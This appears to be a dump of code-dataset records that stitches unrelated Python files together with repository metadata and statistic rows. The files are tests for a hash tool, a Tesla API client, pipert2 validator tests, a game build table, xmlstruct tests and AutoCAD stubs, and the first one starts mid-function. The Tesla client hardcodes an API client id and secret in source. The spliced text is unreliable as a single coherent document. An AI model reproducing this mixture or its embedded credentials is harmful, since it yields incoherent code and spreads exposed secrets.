custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
with pytest.raises(ValueError):
custom_hash.run(output)
def test_custom_hash_preimage_parsing_error_non_integer():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5.5, y = 10, z = 30'
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
with pytest.raises(ValueError):
custom_hash.run(output)
| 33.586957 | 67 | 0.663862 | 605 | 4,635 | 4.821488 | 0.100826 | 0.219404 | 0.262256 | 0.119986 | 0.894069 | 0.891327 | 0.891327 | 0.891327 | 0.85156 | 0.85156 | 0 | 0.023706 | 0.208198 | 4,635 | 137 | 68 | 33.832117 | 0.771117 | 0 | 0 | 0.782609 | 0 | 0 | 0.155771 | 0 | 0 | 0 | 0.002158 | 0 | 0.043478 | 1 | 0.095652 | false | 0 | 0.026087 | 0.017391 | 0.13913 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
8fd10eaf8af781f615084d37f3d19fe12a43c165 | 271 | py | Python | tesla_client.py | benderl/testatus | 82c40cff55969e9944be7150fb903edb788bd7a6 | [
"MIT"
] | 9 | 2019-02-26T03:57:23.000Z | 2020-11-12T07:25:30.000Z | tesla_client.py | benderl/testatus | 82c40cff55969e9944be7150fb903edb788bd7a6 | [
"MIT"
] | 5 | 2019-02-24T03:55:49.000Z | 2021-07-10T14:41:27.000Z | tesla_client.py | benderl/testatus | 82c40cff55969e9944be7150fb903edb788bd7a6 | [
"MIT"
] | 1 | 2019-01-30T21:32:47.000Z | 2019-01-30T21:32:47.000Z | class Tesla_Client(object):
base_info = {"v1": {"id": "81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384", "secret": "c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3", "baseurl": "https://owner-api.teslamotors.com", "api": "/api/1/"}}
| 90.333333 | 242 | 0.778598 | 20 | 271 | 10.45 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.307087 | 0.062731 | 271 | 2 | 243 | 135.5 | 0.515748 | 0 | 0 | 0 | 0 | 0 | 0.693727 | 0.472325 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
8feb349b496d7dcb8ec97c657073c11ee187c353 | 5,149 | py | Python | tests/unit/pipert/core/base/validators/test_flow_validator.py | MayoG/PipeRT2 | 357bf8a5fd3f3fe2149b7b0317d2c39dde66561d | [
"MIT"
] | 1 | 2021-11-23T17:20:11.000Z | 2021-11-23T17:20:11.000Z | tests/unit/pipert/core/base/validators/test_flow_validator.py | MayoG/PipeRT2 | 357bf8a5fd3f3fe2149b7b0317d2c39dde66561d | [
"MIT"
] | 124 | 2021-05-10T06:35:48.000Z | 2022-03-10T09:25:27.000Z | tests/unit/pipert/core/base/validators/test_flow_validator.py | MayoG/PipeRT2 | 357bf8a5fd3f3fe2149b7b0317d2c39dde66561d | [
"MIT"
] | 4 | 2021-09-12T08:10:10.000Z | 2021-11-29T12:10:20.000Z | import pytest
from pipert2 import Wire
from pytest_mock import MockerFixture
from pipert2.core.base.validators import flow_validator
from pipert2.utils.exceptions import FloatingRoutine, UniqueRoutineName
def test_validate_flow(mocker: MockerFixture):
dummy_routine1 = mocker.MagicMock()
dummy_routine1.name = "routine1"
dummy_flow1 = mocker.MagicMock()
dummy_flow1.name = "flow1"
dummy_flow1.routines = {dummy_routine1.name: dummy_routine1}
dummy_routine2 = mocker.MagicMock()
dummy_routine2.name = "routine2"
dummy_flow2 = mocker.MagicMock()
dummy_flow2.name = "flow2"
dummy_flow2.routines = {dummy_routine2.name: dummy_routine2}
dummy_wires = {
(dummy_flow1.name, dummy_routine1.name): Wire(source=dummy_routine1, destinations=(dummy_routine2,))
}
flows = {
dummy_flow1.name: dummy_flow1,
dummy_flow2.name: dummy_flow2
}
flow_validator.validate_flow(flows=flows, wires=dummy_wires)
def test_validate_flows_routines_are_linked_with_valid_flow(mocker: MockerFixture):
dummy_routine1 = mocker.MagicMock()
dummy_routine1.name = "r1"
dummy_routine2 = mocker.MagicMock()
dummy_routine2.name = "r2"
dummy_flow1 = mocker.MagicMock()
dummy_flow1.name = "flow1"
dummy_flow1.routines = {dummy_routine1.name: dummy_routine1,
dummy_routine2.name: dummy_routine2}
dummy_routine3 = mocker.MagicMock()
dummy_routine3.name = "r3"
dummy_routine4 = mocker.MagicMock()
dummy_routine4.name = "r4"
dummy_routine5 = mocker.MagicMock()
dummy_routine5.name = "r5"
dummy_flow2 = mocker.MagicMock()
dummy_flow2.name = "flow2"
dummy_flow2.routines = {dummy_routine3.name: dummy_routine3,
dummy_routine4.name: dummy_routine4,
dummy_routine5.name: dummy_routine5}
flows = {"flow1": dummy_flow1, "flow2": dummy_flow2}
wires = {
("flow1", "r1"): Wire(source=dummy_routine1, destinations=(dummy_routine2, dummy_routine3,)),
("flow_2", "r3"): Wire(source=dummy_routine3, destinations=(dummy_routine4, dummy_routine5)),
}
flow_validator.validate_flows_routines_are_linked(flows, wires)
def test_validate_routines_unique_names(mocker: MockerFixture):
dummy_routine1 = mocker.MagicMock()
dummy_routine1.name = "r1"
dummy_flow1 = mocker.MagicMock()
dummy_flow1.name = "flow1"
dummy_flow1.routines = {dummy_routine1.name: dummy_routine1}
dummy_routine3 = mocker.MagicMock()
dummy_routine3.name = "r3"
dummy_routine4 = mocker.MagicMock()
dummy_routine4.name = "r4"
dummy_flow2 = mocker.MagicMock()
dummy_flow2.name = "flow2"
dummy_flow2.routines = {
dummy_routine3.name: dummy_routine3,
dummy_routine4.name: dummy_routine4
}
flows = {"flow1": dummy_flow1, "flow2": dummy_flow2}
flow_validator.validate_routines_unique_names(flows)
def test_validate_routines_unique_names_existing_names(mocker: MockerFixture):
dummy_routine1 = mocker.MagicMock()
dummy_routine1.name = "r1"
dummy_flow1 = mocker.MagicMock()
dummy_flow1.name = "flow1"
dummy_flow1.routines = {dummy_routine1.name: dummy_routine1}
dummy_routine3 = mocker.MagicMock()
dummy_routine3.name = "r1"
dummy_routine4 = mocker.MagicMock()
dummy_routine4.name = "r4"
dummy_flow2 = mocker.MagicMock()
dummy_flow2.name = "flow2"
dummy_flow2.routines = {
dummy_routine3.name: dummy_routine3,
dummy_routine4.name: dummy_routine4
}
flows = {"flow1": dummy_flow1, "flow2": dummy_flow2}
with pytest.raises(UniqueRoutineName) as error:
flow_validator.validate_routines_unique_names(flows)
assert "r1" in str(error)
def test_validate_flows_routines_are_linked_floating_routine_build_raises_error(mocker: MockerFixture):
dummy_routine1 = mocker.MagicMock()
dummy_routine1.name = "r1"
dummy_routine2 = mocker.MagicMock()
dummy_routine2.name = "r2"
dummy_flow1 = mocker.MagicMock()
dummy_flow1.name = "flow1"
dummy_flow1.routines = {dummy_routine1.name: dummy_routine1,
dummy_routine2.name: dummy_routine2}
dummy_routine3 = mocker.MagicMock()
dummy_routine3.name = "r3"
dummy_routine4 = mocker.MagicMock()
dummy_routine4.name = "r4"
dummy_routine5 = mocker.MagicMock()
dummy_routine5.name = "r5"
dummy_flow2 = mocker.MagicMock()
dummy_flow2.name = "flow2"
dummy_flow2.routines = {dummy_routine3.name: dummy_routine3,
dummy_routine4.name: dummy_routine4,
dummy_routine5.name: dummy_routine5}
flows = {"flow1": dummy_flow1, "flow2": dummy_flow2}
wires = {
("flow1", "r1"): Wire(source=dummy_routine1, destinations=(dummy_routine2, dummy_routine3,)),
("flow_2", "r3"): Wire(source=dummy_routine3, destinations=(dummy_routine4,)),
}
with pytest.raises(FloatingRoutine) as error:
flow_validator.validate_flows_routines_are_linked(flows=flows, wires=wires)
assert "r5" in str(error)
| 31.206061 | 108 | 0.702078 | 585 | 5,149 | 5.863248 | 0.097436 | 0.122449 | 0.163265 | 0.046647 | 0.854227 | 0.841108 | 0.813994 | 0.742857 | 0.714869 | 0.714869 | 0 | 0.04312 | 0.198291 | 5,149 | 164 | 109 | 31.396341 | 0.787791 | 0 | 0 | 0.706897 | 0 | 0 | 0.033405 | 0 | 0 | 0 | 0 | 0 | 0.017241 | 1 | 0.043103 | false | 0 | 0.043103 | 0 | 0.086207 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
890dec6a0b10256a91dc09d6fda776caebc50d60 | 33,541 | py | Python | build_cp.py | SamCHogg/GlossyMudcrab | a669bd00a9d61e3da69d4f0e132470c67fcb321f | [
"MIT"
] | null | null | null | build_cp.py | SamCHogg/GlossyMudcrab | a669bd00a9d61e3da69d4f0e132470c67fcb321f | [
"MIT"
] | null | null | null | build_cp.py | SamCHogg/GlossyMudcrab | a669bd00a9d61e3da69d4f0e132470c67fcb321f | [
"MIT"
] | 1 | 2021-05-06T00:48:03.000Z | 2021-05-06T00:48:03.000Z | builds = [
{
"display_name": "Magicka Nightblade",
"names": ["magblade", "magicka nightblade"],
"builds": [
{
"name": "Magicka Nightblade",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "61",
},
{
"name": "Spell Erosion",
"value": "1",
},
{
"name": "Master at Arms",
"value": "61",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Magicka Sorcerer",
"names": ["magsorc", "magicka sorcerer"],
"builds": [
{
"name": "Magicka Sorcerer",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "61",
},
{
"name": "Spell Erosion",
"value": "1",
},
{
"name": "Master at Arms",
"value": "61",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Magicka Dragonknight",
"names": ["magdk", "magicka dragonknight"],
"builds": [
{
"name": "Magicka Dragonknight",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "61",
},
{
"name": "Spell Erosion",
"value": "1",
},
{
"name": "Master at Arms",
"value": "61",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Magicka Templar",
"names": ["magplar", "magicka templar"],
"builds": [
{
"name": "Magicka Templar",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "61",
},
{
"name": "Spell Erosion",
"value": "1",
},
{
"name": "Master at Arms",
"value": "61",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Magicka Warden",
"names": ["magden", "magicka warden"],
"builds": [
{
"name": "Magicka Warden",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "61",
},
{
"name": "Spell Erosion",
"value": "1",
},
{
"name": "Master at Arms",
"value": "61",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Magicka Necromancer",
"names": ["magcro", "magicka necromancer", "magicka necro"],
"builds": [
{
"name": "Magicka Necromancer",
"blue": [
{
"name": "Elemental Expert",
"value": "64",
},
{
"name": "Elfborn",
"value": "56",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "9",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Stamina Nightblade",
"names": ["stamblade", "stamina nightblade"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
{
"name": "Bow/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Physical Weapon Expert",
"value": "9",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Piercing",
"value": "16",
},
{
"name": "Precise Strikes",
"value": "66",
},
{
"name": "Thaumaturge",
"value": "34",
},
],
},
]
},
{
"display_name": "Stamina Sorcerer",
"names": ["stamsorc", "stamina sorcerer"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
{
"name": "2H/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
{
"name": "Bow/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Physical Weapon Expert",
"value": "9",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Piercing",
"value": "16",
},
{
"name": "Precise Strikes",
"value": "66",
},
{
"name": "Thaumaturge",
"value": "34",
},
],
},
]
},
{
"display_name": "Stamina Dragonknight",
"names": ["stamdk", "stamina dragonknight"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "72",
},
{
"name": "Physical Weapon Expert",
"value": "2",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "66",
},
{
"name": "Thaumaturge",
"value": "66",
},
],
},
]
},
{
"display_name": "Stamina Templar",
"names": ["stamplar", "stamina templar"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
]
},
{
"display_name": "Stamina Warden",
"names": ["stamden", "stamina warden"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
]
},
{
"display_name": "Stamina Necromancer",
"names": ["stamcro", "stamina necromancer"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
{
"name": "2H/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
{
"name": "Bow/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Physical Weapon Expert",
"value": "9",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Piercing",
"value": "16",
},
{
"name": "Precise Strikes",
"value": "66",
},
{
"name": "Thaumaturge",
"value": "34",
},
],
},
]
},
{
"display_name": "Healer Nightblade",
"names": ["healblade", "healer nightblade"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Healer Sorcerer",
"names": ["healsorc", "healer sorcerer"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Healer Dragonknight",
"names": ["healdk", "healer dragonknight"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Healer Templar",
"names": ["healplar", "healer templar"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Healer Warden",
"names": ["healden", "healer warden"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Healer Necromancer",
"names": ["healcro", "healer necromancer"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
]
| 30.217117 | 68 | 0.18461 | 1,301 | 33,541 | 4.74558 | 0.059954 | 0.092647 | 0.068027 | 0.090703 | 0.852284 | 0.843052 | 0.843052 | 0.843052 | 0.833009 | 0.833009 | 0 | 0.036275 | 0.692615 | 33,541 | 1,109 | 69 | 30.244364 | 0.562561 | 0 | 0 | 0.476105 | 0 | 0 | 0.191706 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8f08a4604262c49caf7df1ac50105b39323914e4 | 2,510 | py | Python | tests/test_repeaters.py | matan1008/xmlstruct | a7b12c5daf5c4622a3d75e39c0c5f837e93e980a | [
"MIT"
] | 3 | 2017-03-21T22:48:44.000Z | 2017-03-22T20:42:18.000Z | tests/test_repeaters.py | matan1008/xmlstruct | a7b12c5daf5c4622a3d75e39c0c5f837e93e980a | [
"MIT"
] | null | null | null | tests/test_repeaters.py | matan1008/xmlstruct | a7b12c5daf5c4622a3d75e39c0c5f837e93e980a | [
"MIT"
] | null | null | null | # coding=utf-8
from xmlstruct import Int, Range, GreedyRange, Array
from xmlstruct.exceptions import RangeError
import pytest
def test_range_build():
xml_range = Range("test", 2, 4, Int("testint"))
obj = [1, 2, 3]
assert xml_range.build(obj) == r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>"
def test_range_parse():
xml_range = Range("test", 2, 4, Int("testint"))
obj = [1, 2, 3]
assert xml_range.parse(r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>") == obj
def test_range_build_less():
xml_range = Range("test", 2, 4, Int("testint"))
obj = [1]
with pytest.raises(RangeError):
xml_range.build(obj)
def test_range_parse_less():
xml_range = Range("test", 2, 4, Int("testint"))
with pytest.raises(RangeError):
xml_range.parse(r"<test><testint>1</testint></test>")
def test_range_build_more():
xml_range = Range("test", 0, 2, Int("testint"))
obj = [1, 2, 3]
with pytest.raises(RangeError):
xml_range.build(obj)
def test_range_parse_more():
xml_range = Range("test", 0, 2, Int("testint"))
with pytest.raises(RangeError):
xml_range.parse(r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>")
def test_range_build_zero():
xml_range = Range("test", 0, 2, Int("testint"))
obj = []
assert xml_range.build(obj) in (r"<test></test>", "<test />")
def test_range_parse_zero():
xml_range = Range("test", 0, 2, Int("testint"))
obj = []
assert xml_range.parse(r"<test></test>") == obj
assert xml_range.parse("<test />") == obj
def test_greedy_range_build():
xml_greedy_range = GreedyRange("test", Int("testint"))
obj = [1, 2, 3]
assert xml_greedy_range.build(obj) == r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>"
def test_greedy_range_parse():
xml_greedy_range = GreedyRange("test", Int("testint"))
obj = [1, 2, 3]
assert xml_greedy_range.parse(r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>") == obj
def test_array_build():
xml_array = Array("test", 3, Int("testint"))
obj = [1, 2, 3]
assert xml_array.build(obj) == r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>"
def test_array_parse():
xml_array = Array("test", 3, Int("testint"))
obj = [1, 2, 3]
assert xml_array.parse(r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>") == obj
| 31.375 | 118 | 0.64741 | 373 | 2,510 | 4.193029 | 0.091153 | 0.086957 | 0.08312 | 0.086957 | 0.86445 | 0.828645 | 0.803708 | 0.803708 | 0.803708 | 0.748721 | 0 | 0.029801 | 0.157769 | 2,510 | 79 | 119 | 31.772152 | 0.710028 | 0.004781 | 0 | 0.5 | 0 | 0.12963 | 0.28766 | 0.217949 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.222222 | false | 0 | 0.055556 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8f41534d462a29b047a21f529edce627206b0a47 | 56,112 | py | Python | extensions/.stubs/clrclasses/Autodesk/AutoCAD/DatabaseServices/__init__.py | vicwjb/Pycad | 7391cd694b7a91ad9f9964ec95833c1081bc1f84 | [
"MIT"
] | 1 | 2020-03-25T03:27:24.000Z | 2020-03-25T03:27:24.000Z | extensions/.stubs/clrclasses/Autodesk/AutoCAD/DatabaseServices/__init__.py | vicwjb/Pycad | 7391cd694b7a91ad9f9964ec95833c1081bc1f84 | [
"MIT"
] | null | null | null | extensions/.stubs/clrclasses/Autodesk/AutoCAD/DatabaseServices/__init__.py | vicwjb/Pycad | 7391cd694b7a91ad9f9964ec95833c1081bc1f84 | [
"MIT"
] | null | null | null | import __clrclasses__.Autodesk.AutoCAD.DatabaseServices.Filters as Filters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AbstractViewTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AbstractViewTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ActionsToEvaluateCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AddObjectSnapInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AlignedDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AngleConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AngularConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AnnotationScale
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AnnotationType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AnnotativeStates
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ApplicationLoadReasons
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Arc
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ArcDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Assoc2dConstraintCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Assoc2dConstraintGroup
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocAction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArray
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArrayCommonParameters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArrayParameters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArrayPathParameters
